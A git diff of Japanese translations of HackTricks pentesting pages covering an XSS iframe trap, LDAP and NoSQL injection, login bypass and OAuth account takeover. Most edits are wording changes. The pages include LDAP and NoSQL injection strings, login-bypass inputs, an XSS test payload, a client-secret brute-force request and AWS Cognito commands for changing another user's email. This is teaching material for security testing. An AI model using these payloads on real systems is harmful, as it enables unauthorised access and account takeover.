+さらに、より現実的にするために、iframeがページの位置を変更したときにチェックする**リスナー**を使用し、ユーザーがブラウザを使用してページを移動していると思わせるようにブラウザのURLを更新することが可能です。
 
 <figure><img src="../images/image (1248).png" alt=""><figcaption><p><a href="https://www.trustedsec.com/wp-content/uploads/2022/04/regEvents.png">https://www.trustedsec.com/wp-content/uploads/2022/04/regEvents.png</a></p></figcaption></figure>
 
@@ -18,6 +18,6 @@ XSS攻撃は基本的に、画面の100%にiframeでウェブページを読み
 
 さらに、リスナーを使用して、被害者が訪れている他のページだけでなく、**フォームに入力されたデータ**を盗んだり（認証情報？）、**ローカルストレージを盗む**ことも可能です...
 
-もちろん、主な制限は、**被害者がタブを閉じたり、ブラウザに別のURLを入力するとiframeから脱出する**ことです。これを行う別の方法は、**ページをリフレッシュする**ことですが、これは新しいページがiframe内に読み込まれるたびに右クリックコンテキストメニューを無効にすることで部分的に**防止**される可能性があります。また、ユーザーのマウスがiframeを離れると、ブラウザのリロードボタンをクリックする可能性があり、この場合、ブラウザのURLはXSSに脆弱な元のURLに更新されるため、ユーザーがリロードすると再び感染します（これはあまりステルスではないことに注意してください）。
+もちろん、主な制限は、**被害者がタブを閉じたり、ブラウザに別のURLを入力するとiframeから脱出する**ことです。これを行う別の方法は、**ページをリフレッシュする**ことですが、これは新しいページがiframe内に読み込まれるたびに右クリックコンテキストメニューを無効にすることで部分的に**防止**できます。また、ユーザーのマウスがiframeを離れたときに気づくことで、ブラウザのリロードボタンをクリックする可能性があり、この場合、ブラウザのURLはXSSに脆弱な元のURLに更新されるため、ユーザーがリロードすると再度感染します（これはあまりステルスではないことに注意してください）。
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md
index b1083bda3..9936ebbbc 100644
--- a/src/pentesting-web/ldap-injection.md
+++ b/src/pentesting-web/ldap-injection.md
@@ -1,40 +1,40 @@
-# LDAPインジェクション
+# LDAP Injection
 
-## LDAPインジェクション
+## LDAP Injection
 
 {{#include ../banners/hacktricks-training.md}}
 
-## LDAPインジェクション
+## LDAP Injection
 
 ### **LDAP**
 
-**LDAPとは何かを知りたい場合は、以下のページにアクセスしてください：**
+**LDAPとは何かを知りたい場合は、以下のページにアクセスしてください:**
 
 {{#ref}}
 ../network-services-pentesting/pentesting-ldap.md
 {{#endref}}
 
-**LDAPインジェクション**は、ユーザー入力からLDAPステートメントを構築するWebアプリケーションを対象とした攻撃です。アプリケーションが入力を**適切にサニタイズしない**場合に発生し、攻撃者がローカルプロキシを通じて**LDAPステートメントを操作**できるようになり、未承認のアクセスやデータ操作につながる可能性があります。
+**LDAP Injection**は、ユーザー入力からLDAPステートメントを構築するウェブアプリケーションを対象とした攻撃です。アプリケーションが入力を**適切にサニタイズしない**場合に発生し、攻撃者がローカルプロキシを通じて**LDAPステートメントを操作**できるようになり、無許可のアクセスやデータ操作につながる可能性があります。
 
 {% file src="../images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
 
-**フィルター** = ( filtercomp )\
-**フィルターコンポーネント** = and / or / not / item\
+**Filter** = ( filtercomp )\
+**Filtercomp** = and / or / not / item\
 **And** = & filterlist\
 **Or** = |filterlist\
 **Not** = ! filter\
-**フィルターリスト** = 1\*filter\
-**アイテム**= simple / present / substring\
-**シンプル** = attr filtertype assertionvalue\
-**フィルタータイプ** = _'=' / '\~=' / '>=' / '<='_\
-**プレゼント** = attr = \*\
-**サブストリング** = attr ”=” \[initial] \* \[final]\
-**初期** = assertionvalue\
-**最終** = assertionvalue\
-&#xNAN;**(&)** = 絶対TRUE\
-&#xNAN;**(|)** = 絶対FALSE
+**Filterlist** = 1\*filter\
+**Item**= simple / present / substring\
+**Simple** = attr filtertype assertionvalue\
+**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
+**Present** = attr = \*\
+**Substring** = attr ”=” \[initial] \* \[final]\
+**Initial** = assertionvalue\
+**Final** = assertionvalue\
+&#xNAN;**(&)** = Absolute TRUE\
+&#xNAN;**(|)** = Absolute FALSE
 
-例えば：\
+例えば:\
 `(&(!(objectClass=Impresoras))(uid=s*))`\
 `(&(objectClass=user)(uid=*))`
 
@@ -46,17 +46,17 @@
 
 **フィルターは正しい構文で送信することが非常に重要です。そうしないとエラーが発生します。フィルターは1つだけ送信する方が良いです。**
 
-フィルターは次のように始まる必要があります： `&` または `|`\
-例： `(&(directory=val1)(folder=public))`
+フィルターは次のように始まる必要があります: `&` または `|`\
+例: `(&(directory=val1)(folder=public))`
 
 `(&(objectClass=VALUE1)(type=Epson*))`\
 `VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
 
-次に： `(&(objectClass=`**`*)(ObjectClass=*))`** が最初のフィルター（実行されるもの）になります。
+次に: `(&(objectClass=`**`*)(ObjectClass=*))`** が最初のフィルター（実行されるもの）になります。
 
-### ログインバイパス
+### Login Bypass
 
-LDAPは、パスワードを保存するためのいくつかの形式をサポートしています：クリア、md5、smd5、sh1、sha、crypt。したがって、パスワードに何を挿入しても、ハッシュ化される可能性があります。
+LDAPは、パスワードを保存するためのいくつかの形式をサポートしています: clear, md5, smd5, sh1, sha, crypt。したがって、パスワードに何を挿入しても、ハッシュ化される可能性があります。
 ```bash
 user=*
 password=*
@@ -133,7 +133,7 @@ Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=P
 ```
 #### データのダンプ
 
-ascii文字、数字、記号を繰り返すことができます:
+ascii文字、数字、記号を繰り返し処理できます:
 ```bash
 (&(sn=administrator)(password=*))    : OK
 (&(sn=administrator)(password=A*))   : KO
diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md
index 807cf1eac..c9ac5e38f 100644
--- a/src/pentesting-web/login-bypass/README.md
+++ b/src/pentesting-web/login-bypass/README.md
@@ -57,9 +57,9 @@ NoSQLインジェクションはパラメータの値を変更する必要があ
 admin' or '
 admin' or '1'='2
 ```
-### LDAP Injection 認証バイパス
+### LDAPインジェクション認証バイパス
 
-[ここでは、**LDAP Injection**を介してログインをバイパスするためのいくつかのトリックを見つけることができます。](../ldap-injection.md#login-bypass)
+[ここでは、**LDAPインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます。](../ldap-injection.md#login-bypass)
 ```
 *
 *)(&
diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md
index 023b49245..4a8dae3a0 100644
--- a/src/pentesting-web/nosql-injection.md
+++ b/src/pentesting-web/nosql-injection.md
@@ -35,7 +35,7 @@ username[$exists]=true&password[$exists]=true
 ```javascript
 query = { $where: `this.username == '${username}'` }
 ```
-攻撃者は、`admin' || 'a'=='a`のような文字列を入力することでこれを悪用でき、クエリは同値性（`'a'=='a'`）を満たす条件によってすべてのドキュメントを返します。これは、`' or 1=1-- -`のような入力を使用してSQLクエリを操作するSQLインジェクション攻撃に類似しています。MongoDBでは、`' || 1==1//`、`' || 1==1%00`、または`admin' || 'a'=='a`のような入力を使用して同様のインジェクションが行えます。
+攻撃者は、`admin' || 'a'=='a`のような文字列を入力することでこれを悪用でき、クエリは同値性（`'a'=='a'`）を満たす条件で全てのドキュメントを返します。これは、`' or 1=1-- -`のような入力を使用してSQLクエリを操作するSQLインジェクション攻撃に類似しています。MongoDBでは、`' || 1==1//`、`' || 1==1%00`、または`admin' || 'a'=='a`のような入力を使用して同様のインジェクションが行えます。
 ```
 Normal sql: ' or 1=1-- -
 Mongo sql: ' || 1==1//    or    ' || 1==1%00     or    admin' || 'a'=='a
diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md
index 939ef43db..700e5833f 100644
--- a/src/pentesting-web/oauth-to-account-takeover.md
+++ b/src/pentesting-web/oauth-to-account-takeover.md
@@ -6,19 +6,19 @@
 
 OAuthはさまざまなバージョンを提供しており、基本的な洞察は[OAuth 2.0 documentation](https://oauth.net/2/)で入手できます。この議論は主に広く使用されている[OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/)に焦点を当てており、**アプリケーションが他のアプリケーションのユーザーアカウントにアクセスまたは操作を行うことを可能にする認可フレームワーク**を提供します（認可サーバー）。
 
-仮想のウェブサイト_**https://example.com**_を考えてみましょう。これは**あなたのすべてのソーシャルメディア投稿を表示する**ために設計されています。これを実現するために、OAuth 2.0が使用されます。_https://example.com_は**あなたのソーシャルメディア投稿にアクセスする**ための許可を求めます。その結果、_https://socialmedia.com_に同意画面が表示され、**要求されている権限とリクエストを行っている開発者**が示されます。あなたが認可すると、_https://example.com_は**あなたの代わりに投稿にアクセスする**能力を得ます。
+仮想のウェブサイト_**https://example.com**_を考えてみてください。これは**すべてのソーシャルメディア投稿を表示する**ために設計されています。プライベートな投稿も含まれます。これを実現するために、OAuth 2.0が使用されます。_https://example.com_は**あなたのソーシャルメディア投稿にアクセスする**ための許可を求めます。その結果、_https://socialmedia.com_に同意画面が表示され、**要求されている権限とリクエストを行っている開発者**が示されます。あなたが承認すると、_https://example.com_は**あなたの代わりに投稿にアクセスする**能力を得ます。
 
 OAuth 2.0フレームワーク内の以下のコンポーネントを理解することが重要です：
 
-- **resource owner**: あなた、すなわち**ユーザー/エンティティ**が、ソーシャルメディアアカウントの投稿など、自分のリソースへのアクセスを許可します。
+- **resource owner**: あなた、つまり**ユーザー/エンティティ**が、ソーシャルメディアアカウントの投稿など、自分のリソースへのアクセスを許可します。
 - **resource server**: **リソースオーナー**の代わりに`access token`を取得した後に認証されたリクエストを管理する**サーバー**、例：**https://socialmedia.com**。
-- **client application**: **リソースオーナー**から認可を求める**アプリケーション**、例：**https://example.com**。
-- **authorization server**: **リソースオーナー**の認証が成功し、認可が得られた後に`client application`に`access tokens`を発行する**サーバー**、例：**https://socialmedia.com**。
-- **client_id**: アプリケーションのための公開の一意の識別子。
-- **client_secret:** アプリケーションと認可サーバーのみが知る機密鍵で、`access_tokens`を生成するために使用されます。
+- **client application**: `resource owner`からの認可を求める**アプリケーション**、例：**https://example.com**。
+- **authorization server**: `resource owner`の認証が成功し、認可が得られた後に`client application`に`access tokens`を発行する**サーバー**、例：**https://socialmedia.com**。
+- **client_id**: アプリケーションの公開されている一意の識別子。
+- **client_secret:** アプリケーションと認可サーバーのみが知っている機密鍵で、`access_tokens`を生成するために使用されます。
 - **response_type**: **要求されるトークンのタイプ**を指定する値、例：`code`。
 - **scope**: `client application`が`resource owner`から要求している**アクセスレベル**。
-- **redirect_uri**: **認可後にユーザーがリダイレクトされるURL**。通常、事前に登録されたリダイレクトURLと一致する必要があります。
+- **redirect_uri**: **ユーザーが認可後にリダイレクトされるURL**。通常、事前に登録されたリダイレクトURLと一致する必要があります。
 - **state**: **ユーザーの認可サーバーへのリダイレクト中にデータを維持するためのパラメータ**。ユニーク性は**CSRF保護メカニズム**として機能するために重要です。
 - **grant_type**: **グラントタイプと返されるトークンのタイプ**を示すパラメータ。
 - **code**: `authorization server`からの認可コードで、`client application`が`access_token`を取得するために`client_id`および`client_secret`と共に使用します。
@@ -30,7 +30,7 @@ OAuth 2.0フレームワーク内の以下のコンポーネントを理解す
 **実際のOAuthフロー**は次のように進行します：
 
 1. あなたは[https://example.com](https://example.com)に移動し、「ソーシャルメディアと統合」ボタンを選択します。
-2. サイトは次に、あなたの投稿にアクセスするためにhttps://example.comのアプリケーションに許可を求めるリクエストを[https://socialmedia.com](https://socialmedia.com)に送信します。リクエストは次のように構成されます：
+2. サイトは次に、あなたの投稿にアクセスするための許可を求めるリクエストを[https://socialmedia.com](https://socialmedia.com)に送信します。リクエストは次のように構成されます：
 ```
 https://socialmedia.com/auth
 ?response_type=code
@@ -50,23 +50,23 @@ POST /oauth/access_token
 Host: socialmedia.com
 ...{"client_id": "example_clientId", "client_secret": "example_clientSecret", "code": "uniqueCode123", "grant_type": "authorization_code"}
 ```
-6. 最後に、プロセスは https://example.com があなたの `access_token` を使用して Social Media に API コールを行い、アクセスすることで終了します。
+6. 最後に、プロセスは https://example.com があなたの `access_token` を使用してソーシャルメディアにAPIコールを行い、アクセスすることで終了します。
 
 ## 脆弱性 <a href="#id-323a" id="id-323a"></a>
 
 ### オープンリダイレクト_uri <a href="#cc36" id="cc36"></a>
 
-`redirect_uri` は OAuth と OpenID の実装においてセキュリティにとって重要であり、認可後に認可コードのような機密データが送信される場所を指示します。誤って設定されると、攻撃者がこれらのリクエストを悪意のあるサーバーにリダイレクトすることを許可し、アカウントの乗っ取りを可能にすることがあります。
+`redirect_uri` はOAuthおよびOpenIDの実装においてセキュリティにとって重要であり、認可後に認可コードなどの機密データが送信される場所を指示します。誤って設定されると、攻撃者がこれらのリクエストを悪意のあるサーバーにリダイレクトさせ、アカウントの乗っ取りを可能にすることがあります。
 
-悪用技術は、認可サーバーの検証ロジックに基づいて異なります。厳密なパス一致から、指定されたドメインまたはサブディレクトリ内の任意の URL を受け入れることまで様々です。一般的な悪用方法には、オープンリダイレクト、パストラバーサル、弱い正規表現の悪用、トークン窃盗のための HTML インジェクションが含まれます。
+悪用技術は、認可サーバーの検証ロジックに基づいて異なります。厳密なパス一致から、指定されたドメインまたはサブディレクトリ内の任意のURLを受け入れることまで様々です。一般的な悪用方法には、オープンリダイレクト、パストラバーサル、弱い正規表現の悪用、トークン窃盗のためのHTMLインジェクションが含まれます。
 
-`redirect_uri` の他にも、`client_uri`、`policy_uri`、`tos_uri`、`initiate_login_uri` などの OAuth および OpenID パラメータもリダイレクト攻撃に対して脆弱です。これらのパラメータはオプションであり、そのサポートはサーバーによって異なります。
+`redirect_uri` の他にも、`client_uri`、`policy_uri`、`tos_uri`、`initiate_login_uri` などのOAuthおよびOpenIDパラメータもリダイレクト攻撃に対して脆弱です。これらのパラメータはオプションであり、サーバーによってサポートが異なります。
 
-OpenID サーバーをターゲットにする場合、ディスカバリーエンドポイント (`**.well-known/openid-configuration**`) は、`registration_endpoint`、`request_uri_parameter_supported`、および "`require_request_uri_registration`" のような貴重な構成詳細をリストすることがよくあります。これらの詳細は、登録エンドポイントやサーバーの他の構成の特定に役立ちます。
+OpenIDサーバーをターゲットにする場合、ディスカバリーエンドポイント（`**.well-known/openid-configuration**`）は、`registration_endpoint`、`request_uri_parameter_supported`、および "`require_request_uri_registration`" などの貴重な構成詳細をリストすることがよくあります。これらの詳細は、登録エンドポイントやサーバーの他の構成の特定に役立ちます。
 
-### リダイレクト実装における XSS <a href="#bda5" id="bda5"></a>
+### リダイレクト実装におけるXSS <a href="#bda5" id="bda5"></a>
 
-このバグバウンティレポート [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html) で述べられているように、リダイレクト **URL がサーバーの応答に反映される可能性があり**、**XSS に対して脆弱である**かもしれません。テストするための可能なペイロード:
+このバグバウンティレポート [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html) で述べられているように、リダイレクト **URLがサーバーの応答に反映される可能性があり**、**XSSに対して脆弱である**かもしれません。テストするための可能なペイロード:
 ```
 https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</script><h1>test</h1>
 ```
@@ -74,16 +74,16 @@ https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</scrip
 
 OAuthの実装において、**`state`パラメータ**の誤用または省略は、**クロスサイトリクエストフォージェリ（CSRF）**攻撃のリスクを大幅に高める可能性があります。この脆弱性は、`state`パラメータが**使用されていない、静的な値として使用されている、または適切に検証されていない**場合に発生し、攻撃者がCSRF保護を回避できるようになります。
 
-攻撃者は、認証プロセスを傍受して自分のアカウントを被害者のアカウントにリンクさせることでこれを悪用し、潜在的な**アカウント乗っ取り**を引き起こすことができます。これは、OAuthが**認証目的**で使用されるアプリケーションでは特に重要です。
+攻撃者は、認可プロセスを傍受して自分のアカウントを被害者のアカウントにリンクさせることでこれを悪用し、潜在的な**アカウント乗っ取り**を引き起こすことができます。これは、OAuthが**認証目的**で使用されるアプリケーションでは特に重要です。
 
-この脆弱性の実例は、さまざまな**CTFチャレンジ**や**ハッキングプラットフォーム**で文書化されており、その実際の影響が強調されています。この問題は、**Slack**、**Stripe**、**PayPal**などのサードパーティサービスとの統合にも及び、攻撃者が通知や支払いを自分のアカウントにリダイレクトできる可能性があります。
+この脆弱性の実例は、さまざまな**CTFチャレンジ**や**ハッキングプラットフォーム**で文書化されており、その実際の影響を強調しています。この問題は、**Slack**、**Stripe**、**PayPal**などのサードパーティサービスとの統合にも及び、攻撃者が通知や支払いを自分のアカウントにリダイレクトできる可能性があります。
 
 **`state`パラメータ**の適切な取り扱いと検証は、CSRFから保護し、OAuthフローを安全に保つために重要です。
 
 ### アカウント乗っ取り前 <a href="#ebe4" id="ebe4"></a>
 
 1. **アカウント作成時のメール確認なし**: 攻撃者は被害者のメールを使用して事前にアカウントを作成できます。被害者が後にサードパーティサービスを使用してログインすると、アプリケーションがこのサードパーティアカウントを攻撃者の事前作成アカウントに誤ってリンクさせ、無許可のアクセスを引き起こす可能性があります。
-2. **緩いOAuthメール確認の悪用**: 攻撃者は、メールを確認しないOAuthサービスを利用して、自分のサービスに登録し、その後アカウントのメールを被害者のものに変更することで悪用する可能性があります。この方法も、最初のシナリオと同様に無許可のアカウントアクセスのリスクがありますが、異なる攻撃ベクターを通じて行われます。
+2. **緩いOAuthメール確認の悪用**: 攻撃者は、メールを確認しないOAuthサービスを悪用し、自分のサービスに登録した後、アカウントのメールを被害者のものに変更することができます。この方法も、最初のシナリオと同様に無許可のアカウントアクセスのリスクがありますが、異なる攻撃ベクターを通じて行われます。
 
 ### 秘密の開示 <a href="#e177" id="e177"></a>
 
@@ -93,7 +93,7 @@ OAuthの実装において、**`state`パラメータ**の誤用または省略
 
 ### クライアントシークレットブルートフォース
 
-サービスプロバイダーのアイデンティティプロバイダーに対して**クライアントシークレットをブルートフォース**し、アカウントを盗む試みを行うことができます。\
+サービスプロバイダーのクライアントシークレットをブルートフォースで試みて、アカウントを盗むことができます。\
 ブルートフォースのリクエストは次のようになる可能性があります:
 ```
 POST /token HTTP/1.1
@@ -106,15 +106,15 @@ code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=au
 ```
 ### Referer Header leaking Code + State
 
-クライアントが**code and state**を持っている場合、異なるページに移動するときに**Refererヘッダー内に反映される**と、脆弱性があります。
+クライアントが**code and state**を持っている場合、異なるページに移動するときに**Refererヘッダーに反映されている**と、脆弱です。
 
 ### Access Token Stored in Browser History
 
-**ブラウザの履歴にアクセス トークンが保存されているか確認します**。
+**ブラウザの履歴にアクセス トークンが保存されているか確認してください**。
 
 ### Everlasting Authorization Code
 
-**認可コードは、攻撃者がそれを盗んで使用できる時間ウィンドウを制限するために、一定の時間だけ存在する必要があります**。
+**認可コードは、攻撃者がそれを盗んで使用できる時間ウィンドウを制限するために、しばらくの間だけ存在するべきです**。
 
 ### Authorization/Refresh Token not bound to client
 
@@ -126,7 +126,7 @@ code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=au
 
 ### AWS Cognito <a href="#bda5" id="bda5"></a>
 
-このバグバウンティレポートでは、[**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **AWS Cognito**がユーザーに返す**トークン**が**ユーザーデータを上書きするのに十分な権限を持っている可能性がある**ことがわかります。したがって、**異なるユーザーのメールアドレスにユーザーのメールアドレスを変更できる場合、他のアカウントを**乗っ取ることができるかもしれません。
+このバグバウンティレポートでは: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **AWS Cognito**がユーザーに返す**トークン**は、**ユーザーデータを上書きするのに十分な権限を持っている可能性があります**。したがって、**異なるユーザーのメールアドレスにユーザーのメールアドレスを変更できる場合、他のアカウントを**乗っ取ることができるかもしれません。
 ```bash
 # Read info of the user
 aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
@@ -143,52 +143,52 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
 ]
 }
 ```
-AWS Cognitoを悪用する方法の詳細については、次を確認してください:
+For more detailed info about how to abuse AWS cognito check:
 
 {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %}
 
-### 他のアプリのトークンを悪用する <a href="#bda5" id="bda5"></a>
+### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>
 
-[**この書き込みで言及されているように**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts)、**トークン**（コードではなく）を受け取ることを期待するOAuthフローは、トークンがアプリに属しているかどうかを確認しない場合、脆弱である可能性があります。
+[**この書き込みで述べられているように**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts)、**トークン**（コードではなく）を受け取ることを期待するOAuthフローは、トークンがアプリに属しているかどうかを確認しない場合、脆弱である可能性があります。
 
-これは、**攻撃者**が自分のアプリケーションで**OAuthをサポートし、Facebookでログイン**する**アプリケーションを作成する**ことができるためです。次に、被害者が**攻撃者のアプリケーション**でFacebookにログインすると、攻撃者は**被害者のユーザーに与えられたOAuthトークンを取得し、それを使用して被害者のOAuthアプリケーションにログインすることができます**。
+これは、**攻撃者**が自分のアプリケーションで**OAuthをサポートし、Facebookでログイン**する**アプリケーションを作成できるためです**。その後、被害者が**攻撃者のアプリケーション**でFacebookにログインすると、攻撃者は**被害者のユーザーに与えられたOAuthトークンを取得し、それを使用して被害者のOAuthアプリケーションにログインすることができます**。
 
 > [!CAUTION]
-> したがって、攻撃者がユーザーに自分のOAuthアプリケーションへのアクセスを取得することに成功すれば、トークンを期待しているアプリケーションで被害者のアカウントを乗っ取ることができるでしょう。
+> したがって、攻撃者がユーザーに自分のOAuthアプリケーションへのアクセスを取得することに成功すれば、トークンを期待しているアプリケーションで被害者のアカウントを乗っ取ることができます。
 
-### 2つのリンクとクッキー <a href="#bda5" id="bda5"></a>
+### Two links & cookie <a href="#bda5" id="bda5"></a>
 
 [**この書き込みによると**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)、被害者が攻撃者のホストを指す**returnUrl**を持つページを開くことが可能でした。この情報は**クッキー（RU）**に**保存され**、**後のステップ**で**プロンプト**が**ユーザー**にその攻撃者のホストへのアクセスを許可するかどうかを**尋ねます**。
 
 このプロンプトを回避するために、**returnUrl**を使用してこのRUクッキーを設定するために**Oauthフロー**を開始するタブを開き、プロンプトが表示される前にタブを閉じ、新しいタブをその値なしで開くことが可能でした。そうすると、**プロンプトは攻撃者のホストについて通知しませんが、クッキーはそれに設定されるため、**トークンはリダイレクトで攻撃者のホストに送信されます**。
 
-### プロンプトインタラクションバイパス <a href="#bda5" id="bda5"></a>
+### Prompt Interaction Bypass <a href="#bda5" id="bda5"></a>
 
-[**このビデオで説明されているように**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)、一部のOAuth実装では、**`prompt`** GETパラメータをNone（**`&prompt=none`**）として指定することができ、ユーザーがプラットフォームにすでにログインしている場合、ウェブ上で与えられたアクセスを確認するように求められないようにします。
+[**このビデオで説明されているように**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)、一部のOAuth実装では、**`prompt`** GETパラメータをNone（**`&prompt=none`**）として指定することで、ユーザーがプラットフォームにすでにログインしている場合に、ウェブ上で与えられたアクセスを確認するように求められないようにすることができます。
 
 ### response_mode
 
-[**このビデオで説明されているように**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)、最終URLでコードを提供したい場所を示すために**`response_mode`**パラメータを指定することが可能です：
+[**このビデオで説明されているように**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)、**`response_mode`**パラメータを指定して、最終URLでコードをどこに提供したいかを示すことが可能です：
 
-- `response_mode=query` -> コードはGETパラメータ内に提供されます: `?code=2397rf3gu93f`
-- `response_mode=fragment` -> コードはURLフラグメントパラメータ内に提供されます `#code=2397rf3gu93f`
+- `response_mode=query` -> コードはGETパラメータ内に提供されます：`?code=2397rf3gu93f`
+- `response_mode=fragment` -> コードはURLフラグメントパラメータ内に提供されます`#code=2397rf3gu93f`
 - `response_mode=form_post` -> コードは`code`という入力を持つPOSTフォーム内に提供されます
-- `response_mode=web_message` -> コードはポストメッセージで送信されます: `window.opener.postMessage({"code": "asdasdasd...`
+- `response_mode=web_message` -> コードはポストメッセージで送信されます：`window.opener.postMessage({"code": "asdasdasd...`
 
-### OAuth ROPCフロー - 2FAバイパス <a href="#b440" id="b440"></a>
+### OAuth ROPC flow - 2 FA bypass <a href="#b440" id="b440"></a>
 
-[**このブログ投稿によると**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96)、これは**ユーザー名**と**パスワード**を介してOAuthにログインすることを可能にするOAuthフローです。この単純なフロー中に、ユーザーが実行できるすべてのアクションへのアクセスを持つ**トークン**が返される場合、そのトークンを使用して2FAをバイパスすることが可能です。
+[**このブログ投稿によると**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96)、これは**ユーザー名**と**パスワード**を介してOAuthにログインすることを可能にするOAuthフローです。この単純なフロー中に、ユーザーが実行できるすべてのアクションへのアクセスを持つ**トークン**が返される場合、そのトークンを使用して2FAを回避することが可能です。
 
-### オープンリダイレクトに基づくウェブページのリダイレクトでのATO <a href="#bda5" id="bda5"></a>
+### ATO on web page redirecting based on open redirect to referrer <a href="#bda5" id="bda5"></a>
 
-この[**ブログ投稿**](https://blog.voorivex.team/oauth-non-happy-path-to-ato)は、**オープンリダイレクト**を利用して**リファラー**からの値を悪用し、OAuthを使用してATOを実行する方法について説明しています。攻撃は次のとおりです：
+この[**ブログ投稿**](https://blog.voorivex.team/oauth-non-happy-path-to-ato)は、**オープンリダイレクト**を利用して**リファラー**からの値を使用してOAuthを悪用し、ATOを実行する方法について説明しています。攻撃は次のとおりです：
 
 1. 被害者が攻撃者のウェブページにアクセスします
 2. 被害者が悪意のあるリンクを開くと、オープナーが`response_type=id_token,code&prompt=none`を追加パラメータとして使用してGoogle OAuthフローを開始します。**リファラーは攻撃者のウェブサイト**です。
-3. オープナーで、プロバイダーが被害者を認可すると、`redirect_uri`パラメータの値（被害者のウェブ）に30Xコードで戻しますが、リファラーには攻撃者のウェブサイトが残ります。
-4. 被害者の**ウェブサイトはリファラーに基づいてオープンリダイレクトをトリガーし**、被害者のユーザーを攻撃者のウェブサイトにリダイレクトします。**`respose_type`**が**`id_token,code`**であったため、コードは**URLのフラグメント**で攻撃者に返され、被害者のサイトでGoogleを介してユーザーのアカウントを乗っ取ることができます。
+3. オープナーで、プロバイダーが被害者を認証すると、`redirect_uri`パラメータの値（被害者のウェブ）に30Xコードで戻します。これにより、攻撃者のウェブサイトがリファラーに残ります。
+4. 被害者の**ウェブサイトはリファラーに基づいてオープンリダイレクトをトリガーし**、被害者のユーザーを攻撃者のウェブサイトにリダイレクトします。**`respose_type`**が**`id_token,code`**であったため、コードはURLの**フラグメント**で攻撃者に返され、被害者のサイトでGoogleを介してユーザーのアカウントを乗っ取ることができます。
 
-### SSRFのパラメータ <a href="#bda5" id="bda5"></a>
+### SSRFs parameters <a href="#bda5" id="bda5"></a>
 
 [**この研究を確認してください**](https://portswigger.net/research/hidden-oauth-attack-vectors) **この技術の詳細について。**
 
@@ -196,26 +196,27 @@ OAuthにおける動的クライアント登録は、特に**サーバーサイ
 
 **重要なポイント：**
 
-- **動的クライアント登録**は通常`/register`にマッピングされ、`client_name`、`client_secret`、`redirect_uris`、およびロゴやJSON Web Key Sets（JWKs）のURLなどの詳細をPOSTリクエストで受け入れます。
+- **動的クライアント登録**は通常`/register`にマッピングされ、`client_name`、`client_secret`、`redirect_uris`、ロゴやJSON Web Key Sets（JWKs）のURLなどの詳細をPOSTリクエストで受け入れます。
 - この機能は、**RFC7591**および**OpenID Connect Registration 1.0**に記載された仕様に準拠しており、SSRFに対して脆弱なパラメータを含んでいます。
 - 登録プロセスは、いくつかの方法でサーバーをSSRFにさらす可能性があります：
-- **`logo_uri`**: サーバーによって取得される可能性のあるクライアントアプリケーションのロゴのURLで、SSRFを引き起こすか、URLが誤って処理された場合にXSSを引き起こす可能性があります。
-- **`jwks_uri`**: クライアントのJWKドキュメントへのURLで、悪意を持って作成された場合、サーバーが攻撃者が制御するサーバーへの外部リクエストを行う原因となる可能性があります。
-- **`sector_identifier_uri`**: サーバーが取得する可能性のある`redirect_uris`のJSON配列を参照し、SSRFの機会を生み出します。
-- **`request_uris`**: クライアントの許可されたリクエストURIをリストし、サーバーが認可プロセスの開始時にこれらのURIを取得する場合に悪用される可能性があります。
+- **`logo_uri`**：サーバーによって取得される可能性のあるクライアントアプリケーションのロゴのURLで、SSRFを引き起こすか、URLが誤って処理された場合にXSSを引き起こす可能性があります。
+- **`jwks_uri`**：クライアントのJWKドキュメントへのURLで、悪意を持って作成された場合、サーバーが攻撃者が制御するサーバーへの外部リクエストを行う可能性があります。
+- **`sector_identifier_uri`**：サーバーが取得する可能性のある`redirect_uris`のJSON配列を参照し、SSRFの機会を生み出します。
+- **`request_uris`**：クライアントの許可されたリクエストURIをリストし、サーバーが認可プロセスの開始時にこれらのURIを取得する場合に悪用される可能性があります。
 
 **悪用戦略：**
 
 - SSRFは、`logo_uri`、`jwks_uri`、または`sector_identifier_uri`のパラメータに悪意のあるURLを持つ新しいクライアントを登録することでトリガーされる可能性があります。
